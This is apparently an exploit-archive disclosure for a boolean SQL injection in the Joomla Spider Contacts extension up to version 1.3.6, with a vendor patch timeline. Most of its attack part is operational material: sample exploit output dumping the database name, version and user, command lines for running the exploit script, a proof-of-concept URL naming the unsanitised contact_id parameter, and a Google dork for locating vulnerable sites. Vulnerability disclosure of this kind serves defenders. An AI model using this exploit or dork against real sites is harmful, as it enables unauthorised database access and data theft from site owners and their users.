$$$$$\ $$\ $$$$$$\ $$\ $$\
\__$$ | $$ | $$ __$$\ \__| $$ |
$$ | $$$$$$\ $$$$$$\ $$$$$$\$$$$\ $$ | $$$$$$\ $$ / \__| $$$$$$\ $$\ $$$$$$$ | $$$$$$\ $$$$$$\
$$ |$$ __$$\ $$ __$$\ $$ _$$ _$$\ $$ | \____$$\ \$$$$$$\ $$ __$$\ $$ |$$ __$$ |$$ __$$\ $$ __$$\
$$\ $$ |$$ / $$ |$$ / $$ |$$ / $$ / $$ |$$ | $$$$$$$ | \____$$\ $$ / $$ |$$ |$$ / $$ |$$$$$$$$ |$$ | \__|
$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ |$$ |$$ __$$ | $$\ $$ |$$ | $$ |$$ |$$ | $$ |$$ ____|$$ |
\$$$$$$ |\$$$$$$ |\$$$$$$ |$$ | $$ | $$ |$$ |\$$$$$$$ | \$$$$$$ |$$$$$$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$ |
\______/ \______/ \______/ \__| \__| \__|\__| \_______| \______/ $$ ____/ \__| \_______| \_______|\__|
$$ |
$$ |
\__|
$$$$$$\ $$\ $$\ $$\ $$$$$$\ $$$$$$\
$$ __$$\ $$ | $$ | $$$$ | $$ ___$$\ $$ __$$\
$$ / \__| $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ \_$$ | \_/ $$ | $$ / \__|
$$ | $$ __$$\ $$ __$$\_$$ _| \____$$\ $$ _____|\_$$ _| $$ _____| $$ | $$$$$ / $$$$$$$\
$$ | $$ / $$ |$$ | $$ | $$ | $$$$$$$ |$$ / $$ | \$$$$$$\ $$ | \___$$\ $$ __$$\
$$ | $$\ $$ | $$ |$$ | $$ | $$ |$$\ $$ __$$ |$$ | $$ |$$\ \____$$\ $$ | $$\ $$ | $$ / $$ |
\$$$$$$ |\$$$$$$ |$$ | $$ | \$$$$ |\$$$$$$$ |\$$$$$$$\ \$$$$ |$$$$$$$ | $$$$$$\ $$\$$$$$$ |$$\ $$$$$$ |
\______/ \______/ \__| \__| \____/ \_______| \_______| \____/ \_______/ \______|\__|\______/ \__|\______/
j00ml4 Spid3r C0nt4cts <= 1.3.6 SQLi
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[+] Searching for Joomla Spider Contacts vulnerability...
[+]
[!] Boolean SQL injection vulnerability FOUND!
[+]
[+] Detection version in progress....
[+]
[+] EXTENSION VERSION: 1.3.6
[+]
[!] http://10.0.0.67 VULNERABLE!!!
[+]
[!] DB NAME : joomla
[!] DB VERS : 5.0.95
[!] DB USER : pippo@localhost
Exploit Usage
1) Joomla standard path: http://localhost/index.php?option=com_spidercontacts
[user@localhost ~]$ python j00ml4_spider_contacts_136_sqli.py -H http://localhost
2) Joomla Custom path: http://localhost/joomla/index.php?option=com_spidercontacts
[user@localhost ~]$ python j00ml4_spider_contacts_136_sqli.py -H http://localhost -b joomla
Download
Download Exploit: HERE
Info
######################
# Exploit Title : Joomla Spider Contacts <= 1.3.6 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://web-dorado.com/?option=com_wdsubscriptions&view=dwnldfree&format=row&id=60
# Mirror Link : https://mega.co.nz/#!mJwlUahJ!fx7d1ZQszaD3-k66PjWQEBXQafJnEeRDEleN8jqbVOE
# Dork Google: inurl:option=com_spidercontacts
# Date : 2014-09-07
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://localhost/index.php?option=com_spidercontacts&contact_id=[SQLi]&view=showcontact&lang=ca
"contact_id" variable is not sanitized.
######################
# Vulnerability Disclosure Timeline:
2014-09-07: Discovered vulnerability
2014-09-09: Vendor Notification
2014-09-10: Vendor Response/Feedback
2014-09-10: Vendor Fix/Patch
2014-09-10: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################